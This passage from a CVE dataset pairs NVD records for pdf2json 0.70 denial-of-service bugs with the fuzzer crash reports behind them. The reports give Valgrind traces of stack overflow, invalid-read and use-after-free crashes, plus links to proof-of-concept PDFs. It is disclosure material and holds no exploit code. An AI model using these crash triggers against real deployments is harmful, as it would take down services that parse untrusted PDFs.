ObjectStream::ObjectStream(XRef*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43FB1F: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43CE5B: ObjectStream::ObjectStream(XRef*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43FB1F: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43CE5B: ObjectStream::ObjectStream(XRef*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== by 0x43FB1F: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17786== If you believe this happened as a result of a stack ==17786== overflow in your program's main thread (unlikely but ==17786== possible), you can try to increase the size of the ==17786== main thread stack using the --main-stacksize= flag. ==17786== The main thread stack size used in this run was 8388608. ==17786== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==17786== ==17786== Process terminating with default action of signal 11 (SIGSEGV) ==17786== Access not within mapped region at address 0xFFE801FF8 ==17786== Stack overflow in thread #1: can't grow stack to 0xffe801000 ==17786== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) ==17786== If you believe this happened as a result of a stack ==17786== overflow in your program's main thread (unlikely but ==17786== possible), you can try to increase the size of the ==17786== main thread stack using the --main-stacksize= flag. ==17786== The main thread stack size used in this run was 8388608. ==17786== ==17786== HEAP SUMMARY: ==17786== in use at exit: 836,551 bytes in 27,879 blocks ==17786== total heap usage: 27,938 allocs, 59 frees, 946,615 bytes allocated ==17786== ==17786== LEAK SUMMARY: ==17786== definitely lost: 0 bytes in 0 blocks ==17786== indirectly lost: 0 bytes in 0 blocks ==17786== possibly lost: 0 bytes in 0 blocks ==17786== still reachable: 836,551 bytes in 27,879 blocks ==17786== suppressed: 0 bytes in 0 blocks ==17786== Rerun with --leak-check=full to see details of leaked memory ==17786== ==17786== For counts of detected and suppressed errors, rerun with: -v ==17786== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV (stack overflow) on XRef::fetch
https://api.github.com/repos/flexpaper/pdf2json/issues/25/comments
0
2019-05-27T22:46:07Z
2019-05-29T17:40:38Z
https://github.com/flexpaper/pdf2json/issues/25
449,005,870
25
2,213
CVE-2020-19465
2021-07-21T18:15:08.540
An issue has been found in function ObjectStream::getObject in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 4 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/flexpaper/pdf2json/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an invalid read on the function ObjectStream::getObject (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_segv_ObjectStream::getObject Valgrind says ~~~ valgrind pdf2json $PoC /dev/null ==440== Memcheck, a memory error detector ==440== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==440== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==440== Command: ./pdf2json ./PoC_segv_ObjectStream::getObject /dev/null ==440== ==440== Invalid read of size 4 ==440== at 0x43D665: ObjectStream::getObject(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x43FB45: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x4094D9: XRef::getCatalog(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x407B94: Catalog::Catalog(XRef*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x42B5FA: PDFDoc::setup(GString*, GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x42B3B4: PDFDoc::PDFDoc(GString*, GString*, GString*, void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x402163: main (pdf2json.cc:159) ==440== Address 0x10 is not stack'd, malloc'd or (recently) free'd ==440== ==440== ==440== Process terminating with default action of signal 11 (SIGSEGV) ==440== Access not within mapped region at address 0x10 ==440== at 0x43D665: ObjectStream::getObject(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x43FB45: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x4094D9: XRef::getCatalog(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x407B94: Catalog::Catalog(XRef*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x42B5FA: PDFDoc::setup(GString*, GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x42B3B4: PDFDoc::PDFDoc(GString*, GString*, GString*, void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==440== by 0x402163: main (pdf2json.cc:159) ==440== If you believe this happened as a result of a stack ==440== overflow in your program's main thread (unlikely but ==440== possible), you can try to increase the size of the ==440== main thread stack using the --main-stacksize= flag. ==440== The main thread stack size used in this run was 8388608. ==440== ==440== HEAP SUMMARY: ==440== in use at exit: 204,239 bytes in 1,701 blocks ==440== total heap usage: 1,792 allocs, 91 frees, 353,981 bytes allocated ==440== ==440== LEAK SUMMARY: ==440== definitely lost: 0 bytes in 0 blocks ==440== indirectly lost: 0 bytes in 0 blocks ==440== possibly lost: 0 bytes in 0 blocks ==440== still reachable: 204,239 bytes in 1,701 blocks ==440== suppressed: 0 bytes in 0 blocks ==440== Rerun with --leak-check=full to see details of leaked memory ==440== ==440== For counts of detected and suppressed errors, rerun with: -v ==440== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV on ObjectStream::getObject
https://api.github.com/repos/flexpaper/pdf2json/issues/26/comments
0
2019-05-27T23:08:39Z
2019-05-29T17:40:24Z
https://github.com/flexpaper/pdf2json/issues/26
449,008,452
26
2,214
CVE-2020-19466
2021-07-21T18:15:08.573
An issue has been found in function DCTStream::transformDataUnit in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 1 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/flexpaper/pdf2json/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an invalid read on the function DCTStream::transformDataUnit (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_segv_DCTStream::transformDataUnit Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ... ==23848== Invalid read of size 1 ==23848== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x43363B: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x432FB6: DCTStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x487A83: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== Address 0x6fd636 is not stack'd, malloc'd or (recently) free'd ==23848== ==23848== ==23848== Process terminating with default action of signal 11 (SIGSEGV) ==23848== Access not within mapped region at address 0x6FD636 ==23848== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x43363B: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x432FB6: DCTStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x487A83: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==23848== If you believe this happened as a result of a stack ==23848== overflow in your program's main thread (unlikely but ==23848== possible), you can try to increase the size of the ==23848== main thread stack using the --main-stacksize= flag. ==23848== The main thread stack size used in this run was 8388608. ==23848== ==23848== HEAP SUMMARY: ==23848== in use at exit: 230,627 bytes in 1,819 blocks ==23848== total heap usage: 2,242 allocs, 423 frees, 357,101 bytes allocated ==23848== ==23848== LEAK SUMMARY: ==23848== definitely lost: 16 bytes in 1 blocks ==23848== indirectly lost: 8 bytes in 1 blocks ==23848== possibly lost: 0 bytes in 0 blocks ==23848== still reachable: 230,603 bytes in 1,817 blocks ==23848== suppressed: 0 bytes in 0 blocks ==23848== Rerun with --leak-check=full to see details of leaked memory ==23848== ==23848== For counts of detected and suppressed errors, rerun with: -v ==23848== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV on DCTStream::transformDataUnit
https://api.github.com/repos/flexpaper/pdf2json/issues/27/comments
0
2019-05-27T23:09:01Z
2019-05-29T17:40:12Z
https://github.com/flexpaper/pdf2json/issues/27
449,008,482
27
2,215
CVE-2020-19467
2021-07-21T18:15:08.607
An issue has been found in function DCTStream::transformDataUnit in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an Illegal Use After Free .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/flexpaper/pdf2json/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an Use After Free bug on the function DCTStream::transformDataUnit (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_uaf_DCTStream::transformDataUnit Valgrind says: ~~~ pdf2json $PoC /dev/null ... ==12935== Invalid read of size 2 ==12935== at 0x436149: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x43363B: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4331D7: DCTStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4887E8: Object::streamLookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x487A5B: Lexer::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4884C8: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== Address 0x5b21c10 is 16 bytes inside a block of size 32 free'd ==12935== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==12935== by 0x428565: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x446431: Array::~Array() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42855D: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x446431: Array::~Array() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42855D: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x446431: Array::~Array() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42855D: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x446431: Array::~Array() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42855D: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x446431: Array::~Array() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42855D: Object::free() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== Block was alloc'd at ==12935== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==12935== by 0x428284: Object::initArray(XRef*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x48924E: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== ==12935== Invalid read of size 1 ==12935== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x43363B: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4331D7: DCTStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4887E8: Object::streamLookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x487A5B: Lexer::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4884C8: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== Address 0x6ff09c is not stack'd, malloc'd or (recently) free'd ==12935== ==12935== ==12935== Process terminating with default action of signal 11 (SIGSEGV) ==12935== Access not within mapped region at address 0x6FF09C ==12935== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x43363B: DCTStream::readMCURow() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4331D7: DCTStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4887E8: Object::streamLookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x487A5B: Lexer::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4884C8: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x4892BE: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==12935== If you believe this happened as a result of a stack ==12935== overflow in your program's main thread (unlikely but ==12935== possible), you can try to increase the size of the ==12935== main thread stack using the --main-stacksize= flag. ==12935== The main thread stack size used in this run was 8388608. ==12935== ==12935== HEAP SUMMARY: ==12935== in use at exit: 227,902 bytes in 1,796 blocks ==12935== total heap usage: 2,505 allocs, 709 frees, 362,560 bytes allocated ==12935== ==12935== LEAK SUMMARY: ==12935== definitely lost: 16 bytes in 1 blocks ==12935== indirectly lost: 8 bytes in 1 blocks ==12935== possibly lost: 0 bytes in 0 blocks ==12935== still reachable: 227,878 bytes in 1,794 blocks ==12935== suppressed: 0 bytes in 0 blocks ==12935== Rerun with --leak-check=full to see details of leaked memory ==12935== ==12935== For counts of detected and suppressed errors, rerun with: -v ==12935== ERROR SUMMARY: 1921 errors from 3 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV (use after free) on DCTStream::transformDataUnit
https://api.github.com/repos/flexpaper/pdf2json/issues/28/comments
0
2019-05-28T05:41:37Z
2019-05-29T17:39:59Z
https://github.com/flexpaper/pdf2json/issues/28
449,073,008
28
2,216
CVE-2020-19468
2021-07-21T18:15:08.643
An issue has been found in function EmbedStream::getChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to a null pointer derefenrece (invalid read of size 8) .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/flexpaper/pdf2json/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
